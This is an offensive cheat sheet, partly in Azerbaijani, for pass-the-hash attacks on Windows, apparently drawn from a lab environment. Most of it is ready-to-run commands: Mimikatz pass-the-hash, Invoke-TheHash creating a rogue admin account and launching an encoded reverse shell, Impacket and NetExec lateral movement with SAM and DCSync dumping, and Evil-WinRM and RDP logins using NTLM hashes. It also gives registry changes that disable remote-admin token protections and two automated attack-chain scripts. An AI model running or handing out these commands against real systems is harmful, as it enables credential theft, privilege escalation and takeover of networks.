/Windows/WIndows-Account-Dump-Technique

# MIMIKATZ

whomai /fqdn
CN=Administrator,CN=Users,DC=<DOMAIN>,DC=<DOMAIN_EXTENSION>

.\mimikatz.exe privilege::debug "sekurlsa::pth /user:<USER> /rc4:6<NTLM_HASH> /domain:<DOMAIN>.<DOMAIN_EXTENSION> /run:cmd.exe" exit

=====================================================================================================================================================================

# Invoke-The-Hash

git clone https://github.com/Kevin-Robertson/Invoke-TheHash

Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target <TARGET_IP> -Domain <DOMAIN_NAME> -Username <USER> -Hash <HASH> -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
                                                                                                                Create New Local Admin User

Invoke-SMBExec -Target <TARGET_IP> -Domain <DOMAIN_NAME> -Username <USER> -Hash <HASH> -Command "powershell -enc <BASE64>"" -Verbose
                                                                                                      Reverse Shell

=====================================================================================================================================================================

# Impacket

git clone https://github.com/fortra/impacket
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453 ( PSEXEC )
impacket-wmiexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453 ( WMIEXEC )
impacket-smbexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453 ( SMBEXEC )
impacket-smbclient DOMAIN/david@DC01 -hashes :NTLM_HASH ( SMBCLIENT )



Hashed şəkildə istifadə
impacket-wmiexec 'administrator@10.129.201.126' -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Domain ilə
impacket-wmiexec 'DOMAIN/administrator@10.129.201.126' -hashes :30B3783CE2ABF1AF70F77D0660CF3453

PowerShell əvəzinə CMD
impacket-wmiexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453 -shell-type cmd

No output (sessiz)
impacket-wmiexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453 -no-output

=====================================================================================================================================================================

# NetExec

netexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

Full SMB Enumeration + Hash Validation
netexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 \
    --gen-relay-list valid_hosts.txt \
    --shares \
    --rid-brute \
    --local-auth \
    --continuous \
    -o OUTPUT_DIR=./enum_results

Netexec Attack Chain:
#!/bin/bash
# pro_netexec.sh - Professional NetExec Framework
TARGET="172.16.1.0/24"
USER="Administrator"
DOMAIN="."
HASH="30B3783CE2ABF1AF70F77D0660CF3453"
OUTPUT="netexec_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT/{logs,screenshots,loots}
echo "NetExec Attack Chain"
# Phase 1: Discovery & Validation
echo "[+] Phase 1: Host Discovery + Cred Validation"
netexec smb $TARGET -u $USER -d $DOMAIN -H $HASH \
    --gen-relay-list $OUTPUT/valid_hosts.txt \
    -o LOGS=$OUTPUT/logs/discovery.log
# Phase 2: Detailed Enumeration
echo "[+] Phase 2: Shares + RID Brute + Sessions"
netexec smb @$OUTPUT/valid_hosts.txt -u $USER -d $DOMAIN -H $HASH \
    --shares -rid-brute --sessions --disk \
    -o LOGS=$OUTPUT/logs/enum.log
# Phase 3: DCSync Check
echo "[+] Phase 3: DCSync Validation"
netexec smb @$OUTPUT/valid_hosts.txt -u $USER -d $DOMAIN -H $HASH dcsync \
    -o LOGS=$OUTPUT/logs/dcsync.log
# Phase 4: Lateral Movement Prep
echo "[+] Phase 4: SAM Dumps + Privilege Check"
netexec smb @$OUTPUT/valid_hosts.txt -u $USER -d $DOMAIN -H $HASH sam \
    --local-auth -o LOGS=$OUTPUT/logs/sam.log

=====================================================================================================================================================================

# Evil-WinRM Port:5985/5986

# Sessiz connection
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453 -V

# Custom port + SSL
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453 -r 5986

# Script shell
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453 -s ./post_exploits/

# Batch scan
for ip in $(seq 126 130); do evil-winrm -i 10.129.201.$ip -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453 --no-colors -V; done

=====================================================================================================================================================================

# RDP Port:3389

xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B \
    /cert:ignore \
    /sec:nla \
    /bpp:8 \
    -wallpaper \
    -themes \
    -menu-anims \
    /audio-mode:none \
    /vc:off \
    /cert-ignore-flags:CERT1 \
    +clipboard \
    /drive:stealth,/tmp/loot,$TARGET

RDP Attack Chain:
#!/bin/bash
# pro_rdp.sh - Professional RDP Exploitation Framework
TARGET="10.129.201.126" # Change This
USER="julio" # Change This
HASH="64F12CDDAA88057E06A81B54E73B949B" # Change This
echo "RDP Attack Chain "
# Base connection
xfreerdp /v:$TARGET /u:$USER /pth:$HASH \
    /cert:ignore /sec:rdp /bpp:16 +clipboard /f \
    /sound:off /microphone:off \
    +drive:share,/tmp/rdp_loot,$TARGET \
    -decorations
# SOCKS proxy mode
read -p "SOCKS proxy qurmaq istəyirsən? (y/n): " -n 1 -r
if [[ $REPLY =~ ^[Yy]$ ]]; then
    echo ""
    xfreerdp /v:$TARGET /u:$USER /pth:$HASH \
        /portfwd:socks5:127.0.0.1:1080:127.0.0.1:1080 \
        /cert:ignore /f +clipboard
    echo "SOCKS5: 127.0.0.1:1080"
fi

====================================================================================================================================================================

# Remote Admin Token Fix

Əvvəlcə daxil ol
evil-winrm -i 10.129.201.126 -u julio -H 64F12CDDAA88057E06A81B54E73B949B
OR
impacket-wmiexec 'administrator@10.129.204.23' -hashes :30B3783CE2ABF1AF70F77D0660CF3453 -shell-type powershell

Shell-də
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Restart lazım deyil!

Bu əvvəl işləmirdi, indi işləyər
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B 
netexec smb 172.16.1.0/24 -u julio -H 64F12CDDAA88057E06A81B54E73B949B

Fix et
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

RestrictedAdmin 0 etmək
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

Test et
netexec smb 10.129.201.126 -u julio -H 64F12CDDAA88057E06A81B54E73B949B




